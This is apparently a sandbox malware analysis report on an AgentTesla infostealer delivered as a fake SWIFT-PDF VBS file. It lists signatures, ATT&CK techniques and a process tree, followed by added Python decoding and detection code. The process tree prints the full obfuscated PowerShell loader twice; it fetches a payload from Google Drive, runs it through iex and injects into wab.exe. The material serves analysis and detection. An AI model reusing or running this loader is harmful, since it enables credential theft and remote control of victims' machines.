Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-04-2024 01:36

General

  • Target

    SWIFT Copy000224042024-pdf.vbs

  • Size

    34KB

  • MD5

    ec0b0c5aca480e26979b6d7dda8cbb14

  • SHA1

    a98b3addf15724c049e1f2e44a071df9e7b0df21

  • SHA256

    d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170

  • SHA512

    b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713

  • SSDEEP

    384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42

Malware Config

Extracted

  • Family
    agenttesla
  • Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
        3⤵
          PID:2508
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2884
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
            4⤵
              PID:780
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2760
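The two powershell.exe command lines in the tree above carry the whole second stage as `Unarmorial '...'` literals, and the `Microthermic` helper dot-sources `$Nontragic` (which decodes to `iex`) over each decoded statement, so nothing readable appears on disk. The following is an added example, not code from the report or from the loader's author: it ports the `Unarmorial` routine to Python and runs it over a few literals copied verbatim from the first command line. The regex that pulls literals out of a command line and the names used here are this example's own assumptions.

```python
# Added example (not part of the sandbox report): Python port of the loader's string decoder.
#
# In the command line, $Smid = 1 and $Skoningen is assembled at runtime into the method name
# "Substring", so Unarmorial reads:
#   For ($i = 5; $i -lt ($s.Length - 1); $i += 6) { $out += $s.Substring($i, 1) }
# i.e. only offset 5 of every six-character chunk is a real character; the rest is filler.
import re

OFFSET, STRIDE, WIDTH = 5, 6, 1   # loop start, $Expt124 += 6, $Smid


def unarmorial(s):
    """Port of Unarmorial with the same bounds (stops before Length - $Smid)."""
    limit = len(s) - WIDTH                       # $Shia
    return "".join(s[i:i + WIDTH] for i in range(OFFSET, limit, STRIDE))


# Pulls `Unarmorial '<literal>'` out of a command line. PowerShell single-quoted strings only
# escape a quote by doubling it (''), which this sample never does, so [^']* is enough here.
LITERAL_RE = re.compile(r"Unarmorial\s+'([^']*)'")


def decode_literals(command_line):
    """Decode every Unarmorial literal in a command line, in order of appearance."""
    return [unarmorial(m.group(1)) for m in LITERAL_RE.finditer(command_line)]


# Literals copied from the first powershell.exe command line in the process tree.
NONTRAGIC = "In skiVeltae misdxS ant "
HYPERTENSION = "SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch "
FISKERIMINISTEREN152 = "Gaul.> Sytj "
SKRUBBERIER = (" Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.se"
               "To,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/Brugeu"
               "Chiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvn"
               "BiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji Basoo"
               "P.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinN"
               "Bru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ"
               " ko,vtVeder0Be.kf ")

# A fragment of that command line, constructed here from three consecutive assignments in it.
SAMPLE = ("$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';"
          "$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';"
          "$Southwester='Kalds';")


if __name__ == "__main__":
    # $Nontragic -> "iex": Microthermic is `. iex (...)`, an Invoke-Expression of each statement.
    print("Nontragic   :", unarmorial(NONTRAGIC))
    # $Hypertension -> "User-Agent": the header name set on the download request.
    print("Hypertension:", unarmorial(HYPERTENSION))
    # $Skrubberier -> a Google Drive download URL, which is the "legitimate hosting service"
    # the report's signature refers to.
    print("Skrubberier :", unarmorial(SKRUBBERIER))
    print("Sample      :", decode_literals(SAMPLE))
```

Literals that lost characters to whitespace collapsing when the page was rendered will not line up with the six-character stride; the ones above decode cleanly, which is the check to apply before trusting any decoded value from a rendered command line.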

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      • Persistence
        Boot or Logon Autostart Execution (T1547): 1
        Registry Run Keys / Startup Folder (T1547.001): 1
      • Privilege Escalation
        Boot or Logon Autostart Execution (T1547): 1
        Registry Run Keys / Startup Folder (T1547.001): 1
      • Defense Evasion
        Modify Registry (T1112): 1
      • Discovery
        System Information Discovery (T1082): 1
      • Command and Control
        Web Service (T1102): 1
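The process tree is the most reusable part of this report: WScript.exe spawning PowerShell, a 64-bit PowerShell re-launching itself from SysWOW64, cmd.exe started only to echo `%appdata%`, and then wab.exe started with an empty argument list by the very process that carries the SetThreadContext and WriteProcessMemory signatures. The following is an added example, not part of the report, that encodes those four relationships as rules over process-creation events and runs them on events constructed by hand from the tree above (PIDs, parents, image paths and command lines copied from it; the two long obfuscated PowerShell bodies elided with "..."). The field names, rule names and the `ARGLESS_HOST_WATCHLIST` set are this example's assumptions, not any vendor's schema.

```python
# Added example (not part of the sandbox report): parent/child detection rules for the chain above.
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree. PID 2924 is the root as shown, so its parent is
# unknown here (0). The obfuscated PowerShell bodies are elided with "..." on purpose.
EVENTS = [
    ProcEvent(2924, 0, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"'),
    ProcEvent(2612, 2924, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;..."'),
    ProcEvent(2508, 2612, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"'),
    ProcEvent(2884, 2612, r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;..."'),
    ProcEvent(780, 2884, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"'),
    ProcEvent(2760, 2884, r"C:\Program Files (x86)\windows mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Signed Microsoft binaries that are suspicious when PowerShell starts them with no arguments.
# Only wab.exe appears in this report; extending the set is an assumption left to the reader.
ARGLESS_HOST_WATCHLIST = {"wab.exe"}
ECHO_ENV_PROBE = re.compile(r'/c\s+"?echo\s+%\w+%', re.IGNORECASE)


def image_name(path):
    return ntpath.basename(path).lower()


def is_wow64(path):
    return "\\syswow64\\" in path.lower()


def has_arguments(image, cmdline):
    """True unless the command line is nothing but the (optionally quoted) image path."""
    bare = cmdline.strip().lower()
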